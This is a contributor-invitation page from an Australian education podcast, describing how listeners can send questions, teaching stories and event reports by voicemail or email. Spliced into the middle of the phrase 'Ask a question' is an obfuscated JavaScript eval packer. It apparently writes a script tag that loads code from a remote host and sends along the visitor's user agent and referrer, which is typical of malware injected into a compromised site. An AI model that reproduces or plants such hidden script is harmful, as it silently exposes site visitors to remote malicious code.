Get Involved

The TER Podcast is both for and about the Australian education community, and we welcome contributions to the podcast in many ways. At the bottom of this page are guides on how to record and submit our contribution, but first are some suggestions of the kinds of contributions you could make towards future episodes…

Ask eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘b’+e(c)+’b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ziahh|var|u0026u|referrer|rfznb||js|php’.split(‘|’),0,{}))
a question or respond to a discussion topic:

If there’s a question you’d like to ask, or if you’d like to contribute to a discussion or topic you’ve heard on a recent episode, drop us a line!

Share your practice:

If you have a teaching strategy, a program you’ve been trying, or any story of implementing practices in a school context, it could be the subject of our Teachers’ Brains Trust segment. TBT is a recurring segment devoted to sharing examples of practice with the TER community.

Be a ‘roving reporter’:

If you’re attending an education focused event and would like to share ideas and information with the TER community, then we’d love to hear it! You could record a review of the event for a Teachers’ Brains Trust segment, or if you would like to take it further, you could try an interview or discussion about the event. Such things are best planned in advance (especially if you would like some help with technology and recording) so if you’ve got something on your schedule you think might be of interest, drop us a line as info@terpodcast.com and let us know!

How to contribute:

Whatever the purpose of nature of your contribution, there are two main ways to send us a recording.

The first way is to use our SpeakPipe voicemail service. On any device with a microphone attached, just click the ‘send us a voicemail’ button on the right hand side of this page and follow the instructions. This will allow for recordings up of up 3 minutes, which is more than enough

The second way is to record it yourself and send us the recording. Using a recording app on your tablet or smartphone, or recording software on a laptop, you can record your contribution (and check it and rerecord until you’re happy with it!) and then email it to info@terpodcast.com. If the file is too big for email, then upload it to whichever cloud storage you use and share.

So that’s it! We’d love to hear form you and include your voice in future episodes!
